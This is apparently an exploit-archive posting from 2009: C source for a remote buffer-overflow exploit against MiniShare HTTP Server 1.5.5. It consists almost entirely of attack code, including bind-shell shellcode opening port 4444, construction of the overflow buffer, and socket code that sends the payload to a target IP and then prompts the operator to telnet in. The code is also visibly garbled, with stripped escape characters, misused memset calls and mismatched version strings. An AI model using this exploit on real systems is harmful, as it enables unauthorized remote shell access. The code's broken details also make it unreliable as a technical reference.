minishare155-overflow.txt
Posted on 20 October 2009
/* MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM This bug Expl0ited and Discovered by iM4n Sp Tnx2 : Shabgard & Aria Security FOrum The Crimson Idol */ #include <winsock2.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <dos.h> #pragma comment(lib, "ws2_32.lib") #define buffer 557 #define PORT 80 #define NOP 0x90 /* Bind Shell open port 4444 */ char shellcode[]= "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85" "x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19" "xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05" "x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0" "x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74" "xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15" "x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14" "x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53" "x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce" "x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf" "x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb" "x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18" "xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6" "x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16" "x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f" "xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c" "xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18" "x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f" "x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8" "x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e" "x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f" "xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27" "xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2" "x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a" "x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98"; int main(int argc, char *argv[]) { int mini1,mini2,tcp; if (argc < 3) { printf(" MiniShare HTTP Server 1.5.4 Remote Buffer overflow Exploit by eMP3R0r TEAM "); printf(" This bug Expl0ited and Discovered by iM4n "); printf(" Usage : File.exe IPAdress Port "); printf(" Ex : iM4n.exe 127.0.0.1 80 "); exit(-1); } char overflow[buffer]; memset(overflow,NOP,buffer); char win[] = "xEDx1Ex94x7C"; memset(overflow,win,sizeof(win)-1); memset(overflow,shellcode,sizeof(shellcode)-1); overflow[buffer] = 0; WSADATA wsaData; if(WSAStartup(MAKEWORD(2,1),&wsaData) != 0 ) { printf(" windows socket is failed ! "); exit(-1); } struct hostent *remote; remote = gethostbyname (argv[1]); if (! remote) { mini1=inet_addr(argv[1]); } if ((! remote) && (mini1 == INADDR_NONE)) { printf(" unable ro resolve %s ",argv[1]); exit(-1); } tcp = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (! tcp) { printf(" Socket Not created ! "); exit(-1); } struct sockaddr_in http; if (remote != NULL) memset(&(http.sin_addr),remote->h_addr,remote->length); else http.sin_addr.s_addr = mini1; if(remote) http.sin_family = remote->h_addrtype; else http.sin_family = AF_INET; http.sin_port = htons(PORT); printf(" Attacking on HTTP Server ...! %s ",argv[1]); sleep(400); printf(" Sending String on Target ... ",sizeof(overflow)); sleep(300); mini2 = connect (tcp ,(struct sockaddr *) &http,sizeof(struct sockaddr_in)); if(mini2 == 0) { printf(" Sending Socket ...! "); sleep(500); printf(" connecting ...! "); send(tcp,overflow,sizeof(overflow),0); printf(" Exploit Done ! "); // attack on port 4444 printf(" exploit runed ! please telnet ip address and Port 4444 ! "); } else { printf(" Exploit not done and ip address machin not listening in Port 4444! "); } shutdown(tcp,1); closesocket(tcp); return 0; }
